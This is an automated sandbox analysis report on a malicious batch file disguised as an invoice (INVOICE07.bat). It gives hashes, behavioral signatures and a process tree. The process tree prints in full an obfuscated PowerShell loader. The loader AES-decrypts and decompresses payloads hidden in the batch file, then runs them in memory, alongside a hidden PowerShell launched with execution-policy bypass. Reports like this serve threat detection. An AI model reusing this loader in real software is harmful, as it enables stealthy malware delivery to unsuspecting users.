Analysis
max time kernel: 117s
max time network: 119s
platform: windows7_x64
resource: win7-20240215-en
resource tags: arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
submitted: 04-06-2024 01:39
Static task: static1
Behavioral task: behavioral1
  Sample: INVOICE07.bat
  Resource: win7-20240215-en
  4 signatures, 150 seconds
General
Target: INVOICE07.bat
Size: 540KB
MD5: 1952a79579272db52a814baf57821f90
SHA1: 3fcfb6c3d2c08e840d758e905c2f304ec39ca9f3
SHA256: e575145995f725fbaecc1b95c73ec0fbdad3117e1f492dc8d93ad076f5ad2da1
SHA512: 088de9db26c4eda94bb71a5379118418c06bcb46d8ccce7d1da2719c8d742e8347a4dfde9f73afbb362ef461a0af159408d9150adc8653f6e5a3507408eb6a93
SSDEEP: 12288:xToPjPt8r1cxIMTOQo5Xq4PpsXis9Jhqd8FJVqzT+53xH:xeWrOa4UaYpsXlJIdwSIZ
Score: 8/10
Malware Config
Signatures
Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run PowerShell and hide display window.
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes:
    pid   Process
    2992  powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description                 pid   Process
    Token: SeDebugPrivilege     2992  powershell.exe
Suspicious use of WriteProcessMemory (9 IoCs)
  Processes:
    description                        pid   Process  procid_target
    PID 1776 wrote to memory of 2976   1776  cmd.exe  29
    PID 1776 wrote to memory of 2976   1776  cmd.exe  29
    PID 1776 wrote to memory of 2976   1776  cmd.exe  29
    PID 1776 wrote to memory of 2988   1776  cmd.exe  30
    PID 1776 wrote to memory of 2988   1776  cmd.exe  30
    PID 1776 wrote to memory of 2988   1776  cmd.exe  30
    PID 1776 wrote to memory of 2992   1776  cmd.exe  31
    PID 1776 wrote to memory of 2992   1776  cmd.exe  31
    PID 1776 wrote to memory of 2992   1776  cmd.exe  31
Processes
[1] C:\Windows\system32\cmd.exe
    Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat"
    PID: 1776
    Signatures: Suspicious use of WriteProcessMemory

    [2] C:\Windows\system32\cmd.exe
        Command line: cmd /c "set __=^&rem"
        PID: 2976

    [2] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        PID: 2988

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
        PID: 2992
        Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken